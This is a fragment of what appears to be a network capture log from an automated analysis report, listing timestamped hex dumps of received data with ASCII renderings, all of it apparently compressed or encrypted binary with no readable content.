                                                                                                                                                2022-09-29 12:51:45 UTC25257INData Raw: 11 a2 61 56 33 d3 9c 76 5f 4c 8e 67 1a 27 b1 25 3d 3c bf e2 23 07 f3 58 76 79 c6 1e 19 3f 63 eb a7 3d 7b ad 01 1a 05 6b 4a 30 50 a2 d5 c4 41 32 3c 63 26 8b ea 9b 80 77 f0 76 08 7d 9b 5b 66 a9 92 05 04 a2 3e fe 6d 3e 3f 6c 42 bd 8c d0 3b 01 c3 b3 8e 5b ae f6 b0 31 e0 48 2d 47 4a 07 82 43 40 7a d0 70 6e 4e 59 87 83 c3 25 0b 31 53 1d 26 5d 0b 58 ed 4d 29 d2 58 33 26 9d 52 c0 fe 8b 7a d1 0b 53 76 ee da c3 54 dc 80 c7 74 c9 f0 fc 54 50 00 f7 89 4c 88 b4 3f 0f 3c 4b 3b e1 52 b1 2d 23 1d 99 c1 43 8a 4a 4e 55 8f e6 4a 01 c1 6a fc b1 22 db 98 a7 94 6f 95 7f 72 7b a9 61 6f 37 fe 42 92 4b c3 e9 47 9f 29 9b 21 bc 81 d1 62 6b 96 09 dd 36 59 96 4b c2 51 55 34 ff c8 6a 1c 8a 93 59 53 b2 4c 7f 5d 8b ac 1d 9e 0f dd 5d 24 f6 fe ef 53 81 c0 7b 43 35 6f 2c f2 27 d6 9a 47 6d
                                                                                                                                                Data Ascii: aV3v_Lg'%=<#Xvy?c={kJ0PA2<c&wv}[f>m>?lB;[1H-GJC@zpnNY%1S&]XM)X3&RzSvTtTPL?<K;R-#CJNUJj"or{ao7BKG)!bk6YKQU4jYSL]]$S{C5o,'Gm
                                                                                                                                                2022-09-29 12:51:45 UTC25273INData Raw: da ba 57 6e 92 55 d2 61 a9 a3 30 3e 6f 59 b6 93 8b 1e 05 34 e1 aa 42 67 58 ab 2a 6a ea ea 89 af b3 f4 d3 a0 2b 53 34 5c c2 76 db 86 4c 58 4e d1 75 e2 1e 96 6f 09 48 34 42 d5 96 ce ec 6c c4 fa 4f 16 9f 89 b9 fa 06 f6 f7 61 ec 4c 7b 77 60 9f 83 1e aa 66 27 87 a1 e4 4a 75 60 e4 0c 9b f5 80 2d f0 4e e7 ee c1 3d 37 99 ee d3 b1 e8 fe 5f b7 16 09 1d 13 d8 ea e3 22 54 64 eb 12 4c 9d c9 16 eb 2e b9 7a 43 ba 41 18 c3 bc c4 36 99 16 28 21 69 30 40 17 62 0a de f5 73 2b 2d 10 14 e2 82 97 d8 87 82 22 20 a8 b4 86 12 c6 d9 68 6f 5d 2a 81 50 f0 4a 51 d9 fe 94 fc 6a 99 e6 31 ba 01 f4 23 d2 e2 f7 c2 26 9d b5 cb f8 45 3f 7a 6e b5 e0 62 a1 1d 5d 78 11 18 3d 20 41 79 d6 1c a1 77 21 59 3f c2 69 a3 01 11 6a e4 b9 4d 74 49 c6 d5 fb f7 f1 d6 80 ba 40 f6 db d6 99 13 42 8c 23 67 dc
                                                                                                                                                Data Ascii: WnUa0>oY4BgX*j+S4\vLXNuoH4BlOaL{w`f'Ju`-N=7_"TdL.zCA6(!i0@bs+-" ho]*PJQj1#&E?znb]x= Ayw!Y?ijMtI@B#g
                                                                                                                                                2022-09-29 12:51:45 UTC25289INData Raw: a0 93 71 3a e2 3d a3 af 09 7c 33 4e 1e 00 a1 ac a6 6f 81 18 29 2d ff 1d de 47 cf d1 98 c4 71 b0 b6 4a b6 76 8a 99 e4 e4 a2 e8 b7 20 5c b3 c8 15 90 62 e6 dc ef 5a ed 56 5f 7b fc 08 26 73 4f 28 bc 91 df 26 0b f2 32 ab fb 63 55 30 2a 8b 4d 46 51 a4 e7 19 f1 e9 65 63 81 dc a1 fa 42 b0 58 0d b1 7e d3 61 70 2b c4 13 dc f2 d5 d8 1c 71 22 2f 7e 76 29 14 01 de cd 20 f3 9f aa ff 74 a7 50 34 34 2c a7 ee 2f 60 cb 86 63 df 5c bd 07 c2 81 db d7 a7 f3 58 2e 02 e4 50 73 19 e0 20 64 52 2d 2f ec 16 2f cc 0b 9d 27 4a 99 51 05 ff d0 8f 67 dc c8 20 50 a0 38 03 f2 27 8a 36 d1 d5 4a bc 9a 1b 72 6e 02 82 c1 71 85 8c 2e 77 7f 12 17 d2 1c 75 39 0b 5c 7b 3e 40 03 74 27 5a 1d 43 29 51 d6 59 a5 73 b8 94 a3 ed 08 fb 87 89 99 3e f0 90 d3 d3 d3 ee d5 77 8a e3 4d 81 88 b4 e6 95 b2 06 89
                                                                                                                                                Data Ascii: q:=|3No)-GqJv \bZV_{&sO(&2cU0*MFQecBX~ap+q"/~v) tP44,/`c\X.Ps dR-//'JQg P8'6Jrnq.wu9\{>@t'ZC)QYs>wM
                                                                                                                                                2022-09-29 12:51:45 UTC25305INData Raw: d0 da 94 08 99 4a cb fa 96 83 e1 7f a0 f8 ba 6e 24 c5 bc b6 b3 96 62 cc 45 86 d1 ac 12 6c 9a 41 b8 a5 7b f9 86 c5 47 d8 c2 5c be b9 e5 d9 34 29 9a c5 7f b4 a0 75 e3 8e 67 c4 ef 91 4d 48 5a 12 e1 0c b9 ab f8 9c 14 dc 6c e6 98 6c bf 0d 08 43 e8 63 06 76 3b 15 b4 02 a0 60 38 57 43 9a b4 1f 83 6f 34 41 50 18 a3 d9 ec f1 34 54 b4 bc 60 9f c6 46 4a 1b 38 c9 10 cb d5 6d 7f 92 3e b6 48 27 97 bb 6b cb 77 74 19 23 25 b1 f1 3d 1d 75 7a 47 92 24 ac c4 b0 3f a8 be 63 64 8c 9c 9a c3 8a 14 43 a3 ce b9 ac 95 63 3d 9e ee 9d 88 d9 e0 ca ee c4 c0 0d b3 99 30 e6 2a 85 c5 1e dd f6 35 5c 9c 64 a8 ae 07 70 91 c2 ac 7a 41 34 04 0c 5d e2 24 0c 27 75 2a 1c ef 7c a7 54 eb 5d b0 85 d7 ab 4b 50 b3 83 54 5e 57 41 27 f2 bd 55 b5 f7 5f b7 e1 b2 25 c1 e3 16 81 b2 e6 c8 85 af c1 ae eb d0
                                                                                                                                                Data Ascii: Jn$bElA{G\4)ugMHZllCcv;`8WCo4AP4T`FJ8m>H'kwt#%=uzG$?cdCc=0*5\dpzA4]$'u*|T]KPT^WA'U_%
                                                                                                                                                2022-09-29 12:51:45 UTC25321INData Raw: de 51 3e 8a 18 76 50 3e fa 45 d5 f7 a0 82 af 5f 62 5f 43 a5 11 12 2a b5 30 11 2d 4d 1e 3d 57 94 a2 62 e5 77 33 fc 10 60 16 d8 23 b0 70 e1 9b ec da 25 e6 5a c1 79 ba 3c 1b ee c3 a5 38 a6 1c e2 ac 63 69 4e d0 50 f9 ed f0 d8 71 24 b0 d8 54 45 df 74 90 f9 eb 98 61 c1 41 5c 93 64 39 56 94 20 bc af 3c be 24 68 cd ea 32 03 5c 22 5a 22 a6 3c 4d 81 85 fc c0 6c a5 6d 5b 94 e8 e0 31 7c f7 50 3d 50 ab a3 07 d3 60 b8 a0 1a 5a 3e 82 9f 6a 4e 06 5b a8 75 6c 73 88 40 a2 4a de 42 7d a8 cf c5 71 fe d6 34 fb 2a 5b 46 a1 ef 23 93 43 2a 13 13 ed 1f 8d dc 81 f5 95 a3 21 2e 64 1e 16 fb d6 7a be f6 2b 8d e1 c7 c3 86 44 53 eb 8e 5a 3a bc 51 b3 94 5f a2 a6 5a e7 fe 55 56 af 87 a3 bd 71 af b0 39 22 65 77 aa ff cc ba d0 ea 6e 35 c7 36 08 e0 ec 86 24 c1 82 0d 58 36 84 d1 4d db dc 84
                                                                                                                                                Data Ascii: Q>vP>E_b_C*0-M=Wbw3`#p%Zy<8ciNPq$TEtaA\d9V <$h2\"Z"<Mlm[1|P=P`Z>jN[uls@JB}q4*[F#C*!.dz+DSZ:Q_ZUVq9"ewn56$X6M
                                                                                                                                                2022-09-29 12:51:45 UTC25337INData Raw: 7b 8a 4e c8 10 10 00 55 e6 ac ff 3e 4d ff 29 e6 26 48 32 21 ec 57 6c 6b f0 92 eb 22 c2 d1 af e0 1a 08 15 68 5f ef 91 3f a0 10 1f 66 70 72 e1 2a a2 c9 c3 75 d2 52 bc e8 cf a2 b1 97 3d 08 41 91 bd 66 a0 ba a8 76 5d e6 23 b7 43 57 ea 78 ac f4 5a 01 b2 c6 84 76 ef cc 9b 6f 7e 44 56 7f ae fe ca 20 7f ff 9a 7b 95 a1 bd dc 01 dc 77 f8 7f 2a 8c 7c 93 f7 b6 12 b5 c4 96 65 2f 77 a6 de 48 aa f2 6e ed d0 f8 31 7a 8e ae 79 e9 ba 62 c4 20 66 96 38 10 6e 59 fd 4f 00 a0 22 3d 56 3a eb 6e ad d6 9d 27 6e 0f 7c d3 72 9c 91 8a a4 3a 82 8b d6 ec 55 c7 60 8b ba b6 13 88 ef 50 c3 8f fc 26 eb d0 40 a1 1b bc 71 41 d3 e5 c1 50 f9 1c a0 ca 41 b8 61 d2 9c 4b 7b 2b 33 a0 f8 b6 51 8e 01 6a 24 e5 0a 02 a7 06 c4 63 81 46 fb 9e 17 1e e5 34 5b 33 79 e2 f4 23 eb 89 e5 59 0d 87 4a 4a 91 8b
                                                                                                                                                Data Ascii: {NU>M)&H2!Wlk"h_?fpr*uR=Afv]#CWxZvo~DV {w*|e/wHn1zyb f8nYO"=V:n'n|r:U`P&@qAPAaK{+3Qj$cF4[3y#YJJ
                                                                                                                                                2022-09-29 12:51:45 UTC25353INData Raw: 54 0e 9a 6c 14 71 a2 e2 b3 1d 2e 89 b9 72 b2 2e 99 cb 7f 23 d8 06 73 84 1c 2d 7f 1a 9a 3b de b4 7c b0 bc 00 11 00 a6 b6 82 37 8c 88 ad 1f e5 ec 79 d4 e7 96 6a 52 92 02 52 05 a0 61 ff 36 50 89 81 bc 7b 7b 2c 19 8c 91 65 2d f4 77 54 96 46 c5 b8 16 e9 d8 a6 22 0a 13 5a 56 95 5c 47 8f 95 76 98 6b 20 8d 49 5a 70 bd a0 5d dd 47 fd a2 2f ad 6b 59 c6 95 79 b2 d3 a6 a8 1b 22 f4 b9 f7 b6 6d 55 dc a3 6a 91 b4 f5 7c 0b ac 52 84 39 f3 52 79 ac 17 fe 69 30 b2 81 de 0e f7 9f 4b fe e4 e4 c6 d7 37 56 21 c5 60 96 6d 37 85 5f 60 02 66 0f 55 fa 13 37 b1 0e 4d fe ce e8 29 19 0d c7 80 cc fb 41 1b 37 da 6d eb 38 e7 89 6d 0f 33 7f a0 ae b7 4d c6 fc da 43 f4 04 80 99 af ec 3c 9e 74 96 1a 39 64 07 e6 e6 1c f7 dc b5 a3 e7 1a e2 c9 b9 a4 20 e0 ab 11 e4 cc fe 43 f5 b9 e8 6c e7 ed 66
                                                                                                                                                Data Ascii: Tlq.r.#s-;|7yjRRa6P{{,e-wTF"ZV\Gvk IZp]G/kYy"mUj|R9Ryi0K7V!`m7_`fU7M)A7m8m3MC<t9d Clf
                                                                                                                                                2022-09-29 12:51:45 UTC25369INData Raw: 0c 12 94 78 76 df 6d b0 b5 7e 3e c1 3d e9 18 90 62 67 1b 14 0a 12 db 98 4b c6 ef 47 d0 b6 e5 3d 96 85 17 f3 39 b3 ab df d9 5a 80 29 1f 4d 6a f3 f4 42 1b 04 b6 05 76 51 83 4d dc 13 12 62 b6 54 b0 fb 67 dc 40 3d c8 33 0c 39 a3 a5 35 9d ca 3f b0 f8 ad d5 01 be 2e 32 aa 43 01 8d 13 d3 84 30 10 21 32 72 31 52 d3 42 85 7f cd b2 c1 26 26 a7 49 50 37 26 84 4a a7 c7 bc d1 10 c6 43 0e 2a fe 81 88 41 01 de a5 54 0d 01 c9 8c c4 6b 40 3c 8e f0 cf dc 8b 99 71 30 1d 50 62 47 bf 18 4f 34 14 53 2b c6 ed 6d c8 0b 18 a5 0e 9d 7b bb 97 09 a7 29 f2 5d a8 96 0f d4 58 8f e5 3e 62 b7 f1 28 da 0a 20 b6 f2 0e 55 53 b1 54 d0 09 5d 45 d1 52 77 f0 38 d5 79 bf de 27 9d 50 6d 04 36 47 0b 97 15 18 2f ae 95 a3 27 f8 7f 72 9a 32 72 e2 2c d9 13 16 28 a2 ff ff 86 18 4a 44 7c d2 bf bb 2a 0f
                                                                                                                                                Data Ascii: xvm~>=bgKG=9Z)MjBvQMbTg@=395?.2C0!2r1RB&&IP7&JC*ATk@<q0PbGO4S+m{)]X>b( UST]ERw8y'Pm6G/'r2r,(JD|*
                                                                                                                                                2022-09-29 12:51:45 UTC25385INData Raw: 15 51 a6 e8 9e 01 d3 7b b1 f6 9b 7d ca ea 7a c8 c5 8e 19 dd d4 b7 e2 4a e6 15 1c 6d d7 5c 14 0a f3 8e 94 46 54 cd 37 51 a6 b7 86 2c f5 ab d5 5c e9 e1 15 25 58 b7 f6 22 a1 1a fb ef bc 64 04 4f 14 83 8d e6 37 f6 a8 2e 1c 71 b4 31 dc 94 9c 21 c4 73 82 28 83 f7 18 62 d9 cd eb 3b 6f ae 9e 14 e2 0c 80 56 ed 0c 19 31 4a 4d a0 fe 46 90 4f 33 be 58 42 b5 d3 9b 63 17 5e e0 16 b2 56 a3 e0 a5 ec fa 75 5f 4a 60 5d 64 82 9e df 80 e3 81 96 87 42 61 12 e9 e1 16 cd 38 bc cd 02 7b 7b 74 05 79 f7 73 80 7d 68 de 10 da 0c a1 69 70 97 9b 30 40 51 36 bd 31 8d db 36 92 2d 4b 7b 4b 61 00 50 1b ff 22 f8 fc 88 d9 f5 31 7a e5 0e f9 00 b5 41 a4 eb 4d f6 5e 4c 51 58 d2 ef c2 e0 03 12 95 7c 97 c4 35 b6 ed c2 17 35 86 2b 05 5c ca f7 87 2a c9 ef 8b 32 90 9f 03 a4 b0 2e d2 e9 70 d8 4b 55
                                                                                                                                                Data Ascii: Q{}zJm\FT7Q,\%X"dO7.q1!s(b;oV1JMFO3XBc^Vu_J`]dBa8{{tys}hip0@Q616-K{KaP"1zAM^LQX|55+\*2.pKU
                                                                                                                                                2022-09-29 12:51:45 UTC25401INData Raw: d9 7f 28 90 06 2d 43 e6 c3 40 32 c4 40 23 84 ab bc 58 f3 2d b5 20 00 23 74 58 33 6b 39 b2 2b 81 e0 43 32 53 32 a9 c1 aa fc a4 ce b0 1d 49 34 ab 5f 37 68 57 a5 1b 59 f1 1b b2 ea 65 0d aa ef 7c 02 25 20 99 79 6e a4 ee 71 e4 a0 50 12 88 95 80 6e 86 28 eb a0 42 92 e0 09 f9 bd bd 12 51 dd 27 28 0b da 7c 2a 99 55 c6 07 7f 40 99 01 b5 d2 b5 8e ba fd b6 ba 65 aa f3 af 04 70 bc 60 76 67 96 3e 44 90 0b be f8 df ef 45 ed 0d 79 d3 40 6f 96 bc 5c a7 a3 93 6a e0 9f d4 d1 3a 97 07 ac 8e 92 fe 8d f1 0c 17 0b 24 f8 c6 f1 cd 29 95 73 10 63 f9 64 11 7d d1 76 c9 af 43 aa c4 91 95 83 ba 4b 0f 30 c6 95 59 5c ea a7 17 26 69 74 e4 0c 97 94 96 ce 46 20 a7 e1 e8 bd 45 97 1b d6 92 b0 68 b0 5c fb ae df 8d 5c 2a c9 94 37 c6 f7 f0 a7 dd a8 ee 02 d6 a0 4a 20 84 55 0c fe 8e ea bc b0 72
                                                                                                                                                Data Ascii: (-C@2@#X- #tX3k9+C2S2I4_7hWYe|% ynqPn(BQ'(|*U@ep`vg>DEy@o\j:$)scd}vCK0Y\&itF Eh\\*7J Ur
                                                                                                                                                2022-09-29 12:51:45 UTC25417INData Raw: 83 bc e3 97 1f cd 7c 09 33 fa 87 eb 1b 64 cd 96 7a 2f ff 99 de 89 09 51 7a 76 69 a0 cf 6b 0e c0 36 aa 32 f9 1f c2 8d ad ad be 22 63 8b 65 08 cc 9f de ac c5 9c 92 1d b2 2e 9e 29 f5 99 d9 b7 75 62 85 4b d1 82 d1 37 ac e0 b3 fa f6 39 8e 95 71 1c f8 2a 3a e8 88 be 32 39 ce 71 b6 0a 10 9c 64 0b 95 0f f5 5c 3a 89 32 5d d4 b7 3c 00 ff 4d 2c 5a 35 20 86 51 d3 0c d8 6d 75 7f 5b 99 f3 78 4d 22 69 44 f5 a8 59 0b 72 b6 72 ba ed f7 17 e9 c6 a1 33 07 fb 6b 70 59 fd 40 0e 6f ff d3 0a 59 75 d5 55 af da 2e a5 07 83 56 73 0c 30 46 64 0c 42 b8 df 61 8b 34 8e 0b 9a 03 4b ac d0 3e 20 b6 f7 c9 21 7a b1 0e ed 41 26 b6 ce bb ed 67 be 2b 8e 81 cc 81 85 70 25 be 7d f6 70 8a 05 6e 31 91 4f c8 bf 6f 4c c4 70 fa 04 fe 46 a7 94 c6 a1 cf 77 2a 70 f5 86 b4 4a ee 43 fb 07 91 00 50 87 be
                                                                                                                                                Data Ascii: |3dz/Qzvik62"ce.)ubK79q*:29qd\:2]<M,Z5 Qmu[xM"iDYrr3kpY@oYuU.Vs0FdBa4K> !zA&g+p%}pn1OoLpFw*pJCP
                                                                                                                                                2022-09-29 12:51:45 UTC25433INData Raw: dc dd 3a 71 62 07 9a a3 66 47 a4 1e ee 0e 77 d1 e5 11 49 bf d9 09 06 56 8a 15 e8 31 a2 7c e9 d0 02 5d b4 de 4a 92 77 c9 b0 5d 5f 64 d9 02 7d 21 b7 ee 25 87 2b f2 29 8b a0 68 ff e5 e9 97 50 e7 00 3b 23 16 c1 45 72 65 d0 9f d5 86 50 ef 6d 67 ca 9b 92 ae be 44 ca 4b de 04 6b a0 6c 51 53 14 ba d6 4a 0e 4e 0a cf 67 c3 1c 20 17 26 05 7b fd 07 e3 53 6e c6 a8 78 fd 5e 42 e6 95 57 7d 62 df 3b f1 fa 49 84 8d d6 ef 06 05 82 d6 ee 50 f3 cc 7f 47 61 16 92 a4 29 fd d4 e8 7b 65 4a 22 d2 71 0b 66 42 22 88 46 7a bb dd 3f e9 44 ac c5 33 f4 a6 77 eb 13 0b 8a 70 9c 82 14 2c 2e e6 fc 70 22 13 2a 49 e9 54 6b d6 47 6f 8c d8 18 e5 cd 15 b2 ff aa 82 39 ff 35 19 f7 39 55 91 0c cb 9b 48 3d f6 f5 31 76 b2 ac 64 8f 3c c9 0e 32 dd 72 a9 57 89 eb 78 ed ca 90 6e 46 68 0f ac 49 2e e1 96
                                                                                                                                                Data Ascii: :qbfGwIV1|]Jw]_d}!%+)hP;#ErePmgDKklQSJNg &{Snx^BW}b;IPGa){eJ"qfB"Fz?D3wp,.p"*ITkGo959UH=1vd<2rWxnFhI.
                                                                                                                                                2022-09-29 12:51:45 UTC25449INData Raw: 71 41 6a d2 73 f3 d4 25 71 9d 97 ea e4 51 5d fc f5 e4 e8 8b 92 1a 8f 43 5b 7d f6 ad 42 a7 1a a5 ea 2c 22 3e 77 cc 66 a6 63 a3 6f 85 2b 79 47 f7 28 92 96 a1 95 c6 bb 0d b7 49 8f 49 23 36 07 64 89 9f 06 80 5a 8b e4 4f 7e 57 f8 13 d9 f2 87 34 04 b0 7f fa cf cf 90 78 52 7a 5a 5a 05 18 5c bb 16 4f fc ef 0d cd 1a 98 3f 4e fc 9f 68 28 9f 86 87 44 13 10 76 ec 2f 0a 50 09 2f de 6f cc 29 07 96 91 d6 d6 4e bb 2f 3f 13 63 3c 67 b6 cf c4 41 9b f6 66 8c 35 b9 42 3e 9b 92 70 86 18 6b 9a aa 1b 03 33 68 06 09 a4 13 b9 77 56 8a 5e fc d5 74 97 11 ca 71 9c ae 85 6a b3 1e c7 d8 29 e3 4b de 23 1e 9d d3 28 73 06 9c 58 de f3 20 21 5b 94 35 5c 58 52 7f a4 60 95 41 27 ee 90 8b 14 88 a8 0d 55 77 37 58 07 e8 b8 10 26 ff a2 b5 3d 4b cb 14 f2 be 4b 6a d1 e6 51 78 20 b1 80 3c 27 72 6c
                                                                                                                                                Data Ascii: qAjs%qQ]C[}B,">wfco+yG(II#6dZO~W4xRzZZ\O?Nh(Dv/P/o)N/?c<gAf5B>pk3hwV^tqj)K#(sX ![5\XR`A'Uw7X&=KKjQx <'rl
                                                                                                                                                2022-09-29 12:51:45 UTC25465INData Raw: 1b 16 8c 41 8a 22 a6 73 ca 7d a8 6f b6 b2 f3 b6 58 1f 2a 2c 64 e2 eb 01 c0 c0 1b 68 31 f0 94 99 8c c1 56 1a c7 93 ae dd 82 ed 82 7d de 47 69 d1 a2 65 94 3c ed 6d 0e e8 a9 c1 21 64 64 64 e7 76 3f a2 61 e7 0a ef 08 9c 50 f4 97 c0 c3 aa 18 27 f0 b8 55 39 e5 60 9e b1 fc 8a 10 7e f5 49 ef 12 f3 ff b7 35 df f6 2d 0a f0 ca c1 ca be a4 82 ab 61 e2 d7 8b 90 33 89 60 dc f2 77 d5 83 5c 3c 2e 6b 87 11 a6 1c 1d 47 60 af 71 ef 9d 8e 8b bc a7 c0 f0 c5 ee 96 13 66 7c 3d 30 da b8 d9 28 77 fa ed ad ff 89 fb bb df 88 ae f7 9f e0 cb 74 63 89 eb a8 2c 7a c7 fa 0c 4d 99 64 22 73 e1 6a a9 2c fd a3 3a 61 da 00 b8 74 6a 4d 39 1c 32 ef a7 15 75 99 04 66 29 82 49 1e 69 73 5e 51 43 44 e3 be 38 9e 7d 7c ca ca 94 c7 16 ac b9 d1 07 a9 48 2f 13 47 1b 25 5a 92 94 ed 5d 37 d5 2b 53 71 4e
                                                                                                                                                Data Ascii: A"s}oX*,dh1V}Gie<m!dddv?aP'U9`~I5-a3`w\<.kG`qf|=0(wtc,zMd"sj,:atjM92uf)Iis^QCD8}|H/G%Z]7+SqN
                                                                                                                                                2022-09-29 12:51:45 UTC25481INData Raw: 96 65 5f 94 fd 36 fa 66 27 0c 5b 85 26 11 0a 52 ee fd 01 f2 18 cb c0 dd d8 74 8b 05 02 c1 2a 56 29 9a f5 e5 0b de c7 c4 aa b6 86 9c b5 8b 42 f4 20 bd 1e bd 09 27 86 3f e3 7e 27 95 30 f6 fc 16 1e de c3 c3 61 05 5b 48 76 b2 b7 72 91 8c 1b 59 df 46 7b 07 42 e8 1a 67 aa 68 79 25 6d 62 92 e3 6d 38 ad 7b f0 ef 90 57 21 b2 a0 04 b5 4b 93 83 4d 9d f3 31 06 6e b8 c6 a3 f2 0a 6b 51 a7 aa 94 ec 86 6d 6f 5f 8e 27 6f 90 96 89 65 07 79 e6 07 ac a0 b5 a1 77 3a 15 1d 3b 36 4d f7 31 88 a3 a9 4f 1a fa e5 6b 2a 84 5c 44 55 1b 6a 27 d7 57 ba c8 a9 f0 7b 9b ef 89 80 1a 4d 8b a7 30 0f 69 3d 02 65 52 d1 27 f2 ba c6 00 1b 6d 4d d4 b8 9d 9c 45 84 51 9d ff 00 41 1f 39 f0 d2 5e 16 e5 e6 51 42 80 d1 a0 cb f2 c7 e0 d1 16 6c 71 79 ad e9 10 a3 67 fc d2 82 58 0b 2e 90 bf 19 ae 01 99 7c
                                                                                                                                                Data Ascii: e_6f'[&Rt*V)B '?~'0a[HvrYF{Bghy%mbm8{W!KM1nkQmo_'oeyw:;6M1Ok*\DUj'W{M0i=eR'mMEQA9^QBlqygX.|
                                                                                                                                                2022-09-29 12:51:45 UTC25497INData Raw: d4 7d 65 06 29 be 17 1a 7e 65 ee e5 1b 3e 06 ed fc 56 f2 67 9b f0 ba 97 83 ed f9 b4 30 b4 5c 59 9c ee a3 87 9c 51 7b 2c 5d 96 e0 6a f1 c6 51 47 1b d1 aa 1e 98 fb 65 0a 42 90 c9 8f b0 1c 86 aa 1d bd 84 53 a5 12 e5 f7 6d 2b 75 b2 84 03 e3 49 54 f5 8b f0 60 97 e7 6c a3 7e 60 cc b4 2d c8 4e b9 f3 3d 57 69 15 e8 6b d1 ff a3 76 ac a9 da b5 af 47 55 c8 1b 9a f0 ee 59 19 ae ff fd a2 0b 43 95 e0 11 77 ee a9 ed 77 1b 6e 59 65 ec d2 f0 4f ea 4c be f5 db 1f bf 73 9e 17 21 c9 1d 77 99 5c 36 0b e3 0d a9 6b 00 1c 05 22 4d 5d 71 fb 6a de 1f e9 a7 f4 e0 22 36 24 f9 c2 48 64 2b 26 d1 dc ee af 61 d3 c0 2c 1e 52 92 ab d8 02 cc bc 5e 3f 0f 54 48 03 d7 16 d2 f8 42 68 3a 78 40 98 a4 65 6a bc 0a 21 31 03 b6 bf e0 12 e3 6a 76 89 2e ce 2e ac 11 00 10 35 91 1a dc 02 fd 40 8d f1 e6
                                                                                                                                                Data Ascii: }e)~e>Vg0\YQ{,]jQGeBSm+uIT`l~`-N=WikvGUYCwwnYeOLs!w\6k"M]qj"6$Hd+&a,R^?THBh:x@ej!1jv..5@
                                                                                                                                                2022-09-29 12:51:45 UTC25513INData Raw: 72 38 34 19 c9 67 13 2d d1 0a f2 d4 e5 05 ff 58 55 b4 28 92 29 e6 d9 a0 2c ec 8d f8 73 c2 a6 3c bb 8c 5f eb 72 e2 63 36 6f d2 0d d0 72 fc 5b 4b 66 f7 e5 9b c0 4e 15 b1 df 56 c1 2d 2d dc 64 d3 b2 e0 51 b3 ca 3e 26 bf 5c fb b1 f9 e6 42 da 72 06 5f cd ae 05 c8 4f a0 b7 1e c7 a9 ea 1f 85 76 05 9e 38 a4 30 d2 36 1f b8 00 f9 d2 9a 5f 61 ef f1 93 4c 18 05 86 c0 b2 1a b4 a6 50 16 6d f1 43 47 9c 2e 73 bd 89 6c b3 08 68 73 c4 07 ce 17 f9 9e a0 e7 b2 bc fc ad 9d c5 63 f4 6c 9c 32 bc 7a 37 58 f4 0d 3f cb a3 ff 71 17 23 0f c3 be 93 96 57 6e f8 5b 29 85 37 2a d4 29 9b a2 37 c2 22 55 70 1a 0b da 9f 7e 3e 52 67 a9 6e 7f 5c f7 8c 5c 41 16 eb bc dd 8b e0 52 cb ba fd 94 4d a6 4b c3 81 67 64 f2 82 e2 b7 1b 1e 81 f2 7d ac e5 e1 d4 75 53 8b 3e 0b f6 b3 80 c2 31 9f 78 5a 06 04
                                                                                                                                                Data Ascii: r84g-XU(),s<_rc6or[KfNV--dQ>&\Br_Ov806_aLPmCG.slhscl2z7X?q#Wn[)7*)7"Up~>Rgn\\ARMKgd}uS>1xZ
                                                                                                                                                2022-09-29 12:51:45 UTC25529INData Raw: a9 ec 63 f8 bc 9d 7d e3 a1 05 cc 7f f4 10 50 ca de 08 6f 98 d8 67 eb e5 62 82 f2 ec 0b 0b f1 ef ef d8 56 aa e6 31 d7 f6 6c c3 da 9c 21 c1 e7 7a 17 e2 ea d7 2a f1 5b b3 bc 1b 8f fe 7b 77 41 0c 8e c3 7f 42 35 a2 23 84 b8 4c 7a e2 a0 f3 f2 72 67 8d 19 d6 80 4b 2d bb 29 42 81 46 e7 4f 5c 8a 7e f7 56 55 7c 11 3a 5b e1 b7 03 df b4 2d 1b 1e 4d 3d d2 4d 5e b1 48 be 5c b0 52 41 96 a3 24 3a dd 15 32 d4 95 88 0e bc 51 9b b6 a7 1c 98 fe a5 c9 d2 31 b1 78 bf 5c fe 67 fa 88 8c e5 30 a1 f4 a7 93 f4 8e 8c 8e 28 29 a7 8e 2c bd a9 dd d8 4b 1d ee 74 58 34 ca 32 58 76 3d a0 da bd 13 d4 4a a3 2c 8d 86 94 c7 e2 62 c8 07 5b a3 67 a1 fd 4c f8 5e 6f b3 7f c7 1c 0d 25 ed ab 28 79 4a ae c5 ed d4 da f0 95 c0 8f 4c 5e 7a cd 49 67 55 4d a4 0b 31 f3 6b 70 7f d4 25 b1 8d 12 22 95 3d 33
                                                                                                                                                Data Ascii: c}PogbV1l!z*[{wAB5#LzrgK-)BFO\~VU|:[-M=M^H\RA$:2Q1x\g0(),KtX42Xv=J,b[gL^o%(yJL^zIgUM1kp%"=3
                                                                                                                                                2022-09-29 12:51:45 UTC25545INData Raw: dc 9d c5 fb be b0 11 6d 32 57 76 61 1d 85 49 eb b3 26 98 3e 51 a1 3f e4 9f 5e 6d b0 81 73 48 0e f9 18 da 27 01 73 5d 64 43 b6 d3 fd 5c 3b fa 4c 61 2f 15 1c 1d 7d ee 49 d4 9d bf 59 c1 37 ad 5f 73 2a 7f f3 b9 ca 11 6c c1 8c ce 2d 3a 89 17 ad 72 4f 6b a7 13 42 d7 8f 22 89 10 9f 75 e2 86 6c 5e 7d c3 15 50 69 24 c7 ec 21 77 fd be 59 9a ec 9c 7b eb 3b 1b ee 9c 81 58 3e 79 18 4e 4a e9 72 b6 98 6e 20 42 af 97 2c 4f 1b 05 70 f7 7f 95 ff 07 9f 69 df 8c 2c 1d fc be f2 b0 f8 73 b1 b7 5d 38 09 da 18 0b dc 39 18 cb 0b da 88 b2 5d f3 57 94 52 4c 33 56 33 51 e5 04 24 e6 41 95 70 4c df 6c 35 a7 5c be 06 2a 48 45 f6 03 f2 77 6f e9 c8 bf cb 6b 4c e7 19 1b 04 af 5b db c7 00 c7 f1 f7 95 ac a8 a5 3f 3f a0 77 6b 94 16 32 7a 03 d0 0a 90 3e 8d 6b 7e 1a 88 9f 35 17 fd 18 f3 dd 65
                                                                                                                                                Data Ascii: m2WvaI&>Q?^msH's]dC\;La/}IY7_s*l-:rOkB"ul^}Pi$!wY{;X>yNJrn B,Opi,s]89]WRL3V3Q$ApLl5\*HEwokL[??wk2z>k~5e
